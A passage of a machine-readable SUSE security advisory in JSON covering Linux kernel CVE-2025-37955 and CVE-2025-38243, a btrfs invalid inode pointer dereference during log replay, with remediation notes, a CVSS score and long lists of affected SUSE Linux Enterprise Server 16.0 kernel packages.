"summary": "CVE-2025-37955",
"url": "https://www.suse.com/security/cve/CVE-2025-37955"
},
{
"category": "external",
"summary": "SUSE Bug 1243507 for CVE-2025-37955",
"url": "https://bugzilla.suse.com/1243507"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-37955"
},
{
"cve": "CVE-2025-38243",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38243"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix invalid inode pointer dereferences during log replay\n\nIn a few places where we call read_one_inode(), if we get a NULL pointer\nwe end up jumping into an error path, or fallthrough in case of\n__add_inode_ref(), where we then do something like this:\n\n iput(\u0026inode-\u003evfs_inode);\n\nwhich results in an invalid inode pointer that triggers an invalid memory\naccess, resulting in a crash.\n\nFix this by making sure we don\u0027t do such dereferences.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
